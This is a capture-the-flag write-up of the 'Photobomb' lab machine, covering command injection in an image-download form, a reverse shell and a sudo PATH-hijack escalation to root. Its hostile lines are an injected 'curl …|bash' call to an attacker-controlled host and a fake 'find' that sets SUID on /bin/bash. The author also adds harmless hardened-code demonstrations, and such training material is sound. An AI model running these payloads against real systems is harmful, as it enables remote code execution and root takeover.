Photobomb
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 5000 10.129.228.60
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-06 10:14 EDT
Warning: 10.129.228.60 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.228.60
Host is up (0.0056s latency).
Not shown: 51828 closed tcp ports (conn-refused), 13705 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
We have to add photobomb.htb to our /etc/hosts file to view port 80.
JS Credentials
The webpage looks like a corporate page:

When we click the link, it redirects us to some gallery.

Since the page mentions there are credentials, we can view the page source to find photobomb.js, which contains some credentials:
function init() {
// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
}
}
window.onload = init;
These are just the HTTP Basic Auth credentials for /printer (the Authorization header in the requests below carries the same pH0t0:b0Mb! pair, base64-encoded), and the gallery link already supplied them for us, so they don't tell us anything new. Let's move on. At the bottom of the gallery, we can download images.

Here's the request generated when we download a photo:
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000
I didn't know how the server was handling photos, but the long processing time per request suggested that the images are generated on the fly rather than served from a pre-rendered set of every size and format combination. If so, the three parameters probably end up on a command line, and the output file is returned.
I tried some basic command injection and found that the filetype parameter was vulnerable. Appending ;curl 10.10.14.13/rcecfm (URL-encoded, so the space becomes +) is a blind, out-of-band check: the web server on 10.10.14.13 is the place to watch for the /rcecfm request.
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 102
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;curl+10.10.14.13/rcecfm&dimensions=3000x2000

With this, we can use curl 10.10.14.13/shell.sh|bash to get a reverse shell (host shell.sh on 10.10.14.13 and start a listener first; in the form body, URL-encode the space as + and the pipe as %7C).

We can then grab the user flag from the home directory.
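To make the injection concrete, here is an added example of my own (not the box's application code, whose source we never see): the pattern the /printer behaviour implies, with the form fields spliced into one command string that the shell re-parses, beside a hardened version that validates each field and passes it as a separate argument. It assumes the server builds a shell command this way; resize_vulnerable, resize_hardened and valid_shape are hypothetical names, convert is a stub so it runs without ImageMagick, and the inputs are constructed. The payload is what jpg;curl+10.10.14.13/rcecfm decodes to, with curl swapped for a harmless echo.

```shell
#!/bin/sh
# Added example, not the box's code. "convert" is stubbed so this runs
# without ImageMagick; it just reports the command line it was given.
convert() { echo "convert $*"; }

# Vulnerable: the three form fields are spliced into one command string that
# is handed back to the shell, so a ';' in filetype starts a second command.
# (Assumption: the real server builds its command roughly like this.)
resize_vulnerable() {
  photo=$1; filetype=$2; dimensions=$3
  eval "convert source_images/$photo -resize $dimensions out.$filetype"
}

# Hardened: every field must fully match a strict shape before use, and each
# one is passed as its own quoted argument, so the shell never re-parses it.
NL='
'
valid_shape() {  # $1 = value, $2 = extended regex the whole value must match
  case $1 in *"$NL"*) return 1 ;; esac   # a multi-line value is never valid
  printf '%s\n' "$1" | grep -Eq "^($2)$"
}

resize_hardened() {
  photo=$1; filetype=$2; dimensions=$3
  valid_shape "$filetype" 'jpg|png' \
    || { echo "rejected filetype: $filetype" >&2; return 1; }
  valid_shape "$photo" '[A-Za-z0-9._-]+\.jpg' \
    || { echo "rejected photo: $photo" >&2; return 1; }
  valid_shape "$dimensions" '[0-9]{1,5}x[0-9]{1,5}' \
    || { echo "rejected dimensions: $dimensions" >&2; return 1; }
  convert "source_images/$photo" -resize "$dimensions" "out.$filetype"
}

# Constructed input: the decoded filetype from the request, curl -> echo.
PAYLOAD='jpg;echo INJECTED'

echo "--- vulnerable ---"
resize_vulnerable voicu-apostol-MWER49YaD-M-unsplash.jpg "$PAYLOAD" 3000x2000
echo "--- hardened ---"
resize_hardened voicu-apostol-MWER49YaD-M-unsplash.jpg "$PAYLOAD" 3000x2000 \
  || echo "request refused"
resize_hardened voicu-apostol-MWER49YaD-M-unsplash.jpg jpg 3000x2000
```

The allowlist on filetype is the fix that matters: the output format is a small fixed set, so there is no reason for the server to accept anything else. Validating photo and dimensions the same way also closes path traversal through the photo field.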
Privilege Escalation
Sudo Privileges
The user is able to run a script as root.
wizard@photobomb:/tmp$ sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
SETENV means sudo lets us set environment variables on the command line (sudo VAR=value command) and keeps them, even though env_reset would normally scrub them. Crucially, that includes PATH, so the secure_path default above can be overridden for this one command.
Here's the script:
wizard@photobomb:/tmp$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
The find binary is invoked without an absolute path (everything else in the script uses /bin/cat and /usr/bin/truncate). Since SETENV lets us hand sudo our own PATH, we can create a file called find in a directory we control, put that directory first in PATH, and the script will run our find as root.
First, create a file called find with a malicious command:
$ cat find
#!/bin/bash
# runs as root when cleanup.sh's unqualified 'find' resolves to this file
chmod +s /bin/bash
Afterwards, download this to the machine, make it executable (chmod +x find), and run the script with our directory at the front of PATH:
sudo PATH=$PWD:$PATH /opt/cleanup.sh
This makes /bin/bash an SUID root binary. Bash drops the effective UID unless told not to, so spawn it with bash -p to get the root shell.
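The hijack can be reproduced locally, as an unprivileged user and without sudo, to see exactly why the bare find matters. This is an added example of mine, not the box's code: it builds a throwaway directory with a fake find that only reports that it ran, then runs the same find line as cleanup.sh once through PATH and once with an absolute path. run_unqualified and run_qualified are hypothetical names, and the temp directory, fake binary and sample image are constructed.

```shell
#!/bin/sh
# Added example, not the box's code: simulate the PATH hijack locally.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
mkdir -p "$WORK/bin" "$WORK/source_images"
: > "$WORK/source_images/a.jpg"          # constructed stand-in for an original
REAL_FIND=$(command -v find)             # what a hardened script would name explicitly

# Attacker's stand-in for 'find'. On the box it ran "chmod +s /bin/bash";
# this one only reports that it executed, and with which arguments.
cat > "$WORK/bin/find" <<'EOF'
#!/bin/sh
echo "hijacked find ran as uid $(id -u) with args: $*"
EOF
chmod +x "$WORK/bin/find"

# Same shape as the last line of cleanup.sh: a bare 'find' resolved via PATH.
# Putting our directory first (what 'sudo PATH=$PWD:$PATH ...' does, thanks to
# SETENV) makes the shell pick the fake before the real binary.
run_unqualified() {
  (
    cd "$WORK" || exit 1
    PATH="$WORK/bin:$PATH"
    find source_images -type f -name '*.jpg' -exec echo chown root:root {} \;
  )
}

# Hardened variant: an absolute path ignores PATH, so the same hijack is inert.
run_qualified() {
  (
    cd "$WORK" || exit 1
    PATH="$WORK/bin:$PATH"
    "$REAL_FIND" source_images -type f -name '*.jpg' -exec echo chown root:root {} \;
  )
}

echo "--- unqualified find (hijackable) ---"; run_unqualified
echo "--- absolute path (safe) ---";          run_qualified
```

The fix for the script is the same one its other lines already use: call /usr/bin/find, or set PATH explicitly at the top of the script, and drop SETENV from the sudoers rule since nothing in cleanup.sh needs caller-supplied environment variables.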

Rooted!